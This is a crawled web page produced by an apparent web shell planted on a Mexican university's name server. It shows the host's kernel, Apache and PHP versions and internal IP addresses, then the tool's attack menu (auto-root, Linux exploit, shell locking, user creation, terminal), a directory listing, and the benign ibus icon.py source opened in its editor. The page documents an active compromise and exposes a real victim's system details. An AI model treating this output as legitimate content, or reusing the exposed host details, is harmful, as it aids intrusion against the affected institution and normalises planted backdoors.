Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
ibus /
setup /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxrwxr-x
emojilang.py
11.01
KB
-rw-r--r--
engineabout.py
4.92
KB
-rw-r--r--
enginecombobox.py
6.11
KB
-rw-r--r--
enginedialog.py
13.34
KB
-rw-r--r--
enginetreeview.py
9.64
KB
-rw-r--r--
i18n.py
2.38
KB
-rw-r--r--
icon.py
2.83
KB
-rw-r--r--
keyboardshortcut.py
13.88
KB
-rw-r--r--
main.py
27.24
KB
-rw-r--r--
setup.ui
79.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : icon.py
# vim:set et sts=4 sw=4: # # ibus - The Input Bus # # Copyright (c) 2007-2010 Peng Huang <shawn.p.huang@gmail.com> # Copyright (c) 2007-2010 Red Hat, Inc. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 # USA __all__ = ( "load_icon" ) from gi.repository import Gdk from gi.repository import GdkPixbuf from gi.repository import Gtk from os import path icon_theme = Gtk.IconTheme.get_default() dir = path.dirname(__file__) icondir = path.join(dir, "..", "icons") icon_theme.prepend_search_path(icondir) icon_cache = {} # load_icon: # @icon_name_or_path: Can be a name or path but not stock id # because gtk_icon_theme_load_icon() cannot fallback the stock id to # a real file name against gtk_image_new_from_stock(). # @size: #GtkIconSize def load_icon(icon_name_or_path, size): if (icon_name_or_path, size) in icon_cache: return icon_cache[(icon_name_or_path, size)] icon_size = Gtk.icon_size_lookup(size) if icon_size[0]: icon_size = icon_size[1] pixbuf = None try: pixbuf = GdkPixbuf.Pixbuf.new_from_file(icon_name_or_path) w, h = pixbuf.get_width(), pixbuf.get_height() rate = max(w, h) / float(icon_size) w = int(w / rate) h = int(h / rate) pixbuf = pixbuf.scale_simple(w, h, GdkPixbuf.InterpType.BILINEAR) except: # import traceback # traceback.print_exc() pass if pixbuf == None: try: theme = Gtk.IconTheme.get_default() pixbuf = theme.load_icon(icon_name_or_path, icon_size, 0) except: # import traceback # traceback.print_exc() pass if pixbuf == None: try: theme = Gtk.IconTheme.get_default() pixbuf = theme.load_icon('ibus-engine', icon_size, 0) except: # import traceback # traceback.print_exc() pass if pixbuf == None: try: theme = Gtk.IconTheme.get_default() pixbuf = theme.load_icon('image-missing', icon_size, 0) except: # import traceback # traceback.print_exc() pass icon_cache[(icon_name_or_path, size)] = pixbuf return pixbuf
Close